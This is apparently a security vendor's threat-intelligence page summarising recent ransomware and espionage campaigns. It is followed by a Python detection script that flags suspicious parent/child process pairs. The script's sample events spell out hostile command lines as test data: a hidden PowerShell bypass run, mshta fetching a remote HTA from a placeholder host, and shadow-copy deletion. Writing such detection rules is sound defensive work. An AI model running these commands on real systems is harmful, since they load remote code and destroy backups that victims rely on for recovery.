New Immediate Threats!

The Cymulate Research Lab detects and analyses new cyber threats every week and immediately makes BAS attack scenarios for them available.

This lets you proactively and automatically test your own cyber resilience offensively, so you know right away whether your security controls are still adequate.


Immediate Threats

    • Technical Analysis Of The SynapseCrypter Ransomware-As-A-Service

      SynapseCrypter, a recently identified ransomware that emerged in early 2024, is distributed as Ransomware-as-a-Service (RaaS) on the Russian dark web forum RAMP. The SynapseCrypter.exe payload is capable of rapid encryption using multiple encryption modes, performs NTFS searches, and escalates privileges via access token manipulation. It avoids encrypting systems in Iran, suggesting possible affiliations with Iran-sympathizer groups. Synapse uses a custom encryption algorithm, like Babuk ransomware, and appears to have borrowed features from the Lambda ransomware family, hinting at reused code and connections with other RaaS groups or developers. The ransomware checks system time zones and languages to ensure Iranian systems are excluded, uses NTFS search, and deletes shadow copies before encryption. Encrypted telemetry is sent to designated C2 IPs, and the malware is also capable of network scanning and replication.

    • RansomHub Ransomware Exploits Zerologon Vulnerability To Encrypt Files

      RansomHub, a new and rapidly growing Ransomware-as-a-Service (RaaS), is likely an updated version of the older Knight ransomware. Analysis revealed significant similarities between the two, suggesting RansomHub originated from Knight. Despite this, it is unlikely that Knight's original creators are behind RansomHub. Knight's source code, originally known as Cyclops, was sold on underground forums in February 2024 after its developers shut down their operation, potentially allowing others to update and launch it as RansomHub. Both RansomHub and Knight are written in Go, and most variants are obfuscated with Gobfuscate, except for some early Knight versions. The code overlap is substantial, making differentiation difficult without checking the embedded link to the data leak site. Both have nearly identical command-line help menus, with RansomHub adding only a sleep command.

    • DarkPeony Carries Out Operation Control Plug

      The DarkPeony threat actor executed Operation ControlPlug against military and government agencies in Myanmar, the Philippines, Mongolia and Serbia. The campaign began with MSC files which, when opened, displayed a screen prompting users to click a link that executed a PowerShell script. This script remotely downloaded and executed an MSI file containing an EXE, a DLL and a DAT file. The EXE, though legitimate, was used for DLL side-loading: it loaded the DLL, which decoded and executed the DAT file, ultimately running PlugX. The MSC files, opened with Microsoft Management Console, abused its Console Taskpad feature to execute arbitrary commands, deceiving users into triggering the PowerShell script. Websites distributing the MSI files used Cloudflare to control access, obstructing researchers while targeting specific organizations.

    • Dissecting SSLoad Malware A Comprehensive Technical Analysis

      This in-depth analysis explores the inner workings of SSLoad, a stealthy and adaptable malware known for its sophisticated delivery methods and evasion techniques. The investigation unravels the malware's multistage infection chain, dissecting the various loaders, decryption algorithms and payloads employed across different campaigns. The analysis highlights SSLoad's ability to gather reconnaissance, evade detection and deploy additional malicious components, underscoring its versatility and ever-evolving nature.

    • Cert IL Alert - Phishing campaign by Muddy Water

      Recently, the National Cyber Directorate detected an active phishing campaign in the Israeli domain. The campaign is operating extensively across all sectors. The National Cyber Directorate attributes this campaign to the Iranian attack group MuddyWater, based on familiarity with the group's infrastructure and TTPs (Tactics, Techniques and Procedures).

    • PHP Vulnerability CVE-2024-4577 Weaponized To Distribute TellYouThePass Ransomware

      Researchers have identified threat actors exploiting a PHP vulnerability (CVE-2024-4577) to spread TellYouThePass ransomware variants. The attackers use the exploit to run arbitrary PHP code, calling the "system" function to execute an HTML Application (HTA) file hosted on their server via the mshta.exe binary, which can execute remote payloads on Windows systems; this is a "living off the land" technique. TellYouThePass ransomware, active since 2019, has evolved and now often appears as .NET samples delivered through HTML applications. The initial infection uses an HTA file containing malicious VBScript with a base64-encoded binary that is loaded into memory at runtime. Upon execution, the malware sends an HTTP request to its command-and-control (C2) server disguised as a CSS resource request to avoid detection. The malware then enumerates directories, kills processes, generates encryption keys and encrypts files with specific extensions. Finally, it places a ReadMe message in the web root directory to inform victims.

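Three of the chains summarized above share one detectable property: an unusual parent/child process pair. The MSC Console Taskpad abuse makes mmc.exe launch PowerShell, the CVE-2024-4577 chain makes php-cgi.exe launch mshta.exe against a remote HTA, and SynapseCrypter deletes shadow copies before encrypting. The following is an added example, not Cymulate code or one of its BAS scenarios, that runs three such parent/child rules over constructed Sysmon-style process-creation events. The hostnames, file paths, command lines and example.invalid URLs are invented for the demonstration.

```python
"""Parent/child process-pair detection over constructed Sysmon-style events.

Added example, not Cymulate code. Hostnames, paths and URLs are invented.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Fields of a process-creation event (Sysmon Event ID 1 style)."""
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str


def base(path: str) -> str:
    """Lower-cased file name; ntpath handles Windows paths on any host OS."""
    return ntpath.basename(path).lower()


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# (rule name, predicate). Each rule encodes one chain from the summaries above.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    # MSC Console Taskpad abuse: mmc.exe has no business launching script hosts.
    ("mmc_spawns_script_host",
     lambda e: base(e.parent_image) == "mmc.exe" and base(e.image) in SCRIPT_HOSTS),
    # CVE-2024-4577 chain: php-cgi.exe running mshta.exe against a remote HTA.
    ("php_cgi_spawns_remote_mshta",
     lambda e: base(e.parent_image) == "php-cgi.exe"
     and base(e.image) == "mshta.exe"
     and re.search(r"https?://", e.command_line, re.IGNORECASE) is not None),
    # Pre-encryption shadow copy deletion (vssadmin or wmic variants).
    ("shadow_copy_deletion",
     lambda e: base(e.image) in {"vssadmin.exe", "wmic.exe"}
     and re.search(r"delete\s+shadows|shadowcopy\s+delete",
                   e.command_line, re.IGNORECASE) is not None),
]

# Constructed sample events; the benign ones exercise the negative path.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
    ProcEvent("WS01", r"C:\Windows\System32\mmc.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -ep bypass -f C:\Users\Public\stage.ps1"),
    ProcEvent("WEB01", r"C:\php\php-cgi.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://stage.example.invalid/loader.hta"),
    ProcEvent("WEB01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("DC01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe list shadows"),   # benign: enumeration only
    ProcEvent("WEB01", r"C:\Apache24\bin\httpd.exe", r"C:\php\php-cgi.exe",
              "php-cgi.exe"),                   # benign: normal CGI worker start
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (rule name, host, child image name) for every event that trips a rule."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event.host, base(event.image)))
    return hits


if __name__ == "__main__":
    for name, host, image in evaluate(SAMPLE_EVENTS):
        print(f"{host}: {name} ({image})")
```

The rules key on the parent image rather than on command-line strings alone, because the payload URLs and script names change per campaign while the parent/child relationship does not. The "list shadows" event is included to show that the shadow-copy rule does not fire on routine enumeration, and the httpd.exe to php-cgi.exe event shows that a normal CGI worker start is not flagged.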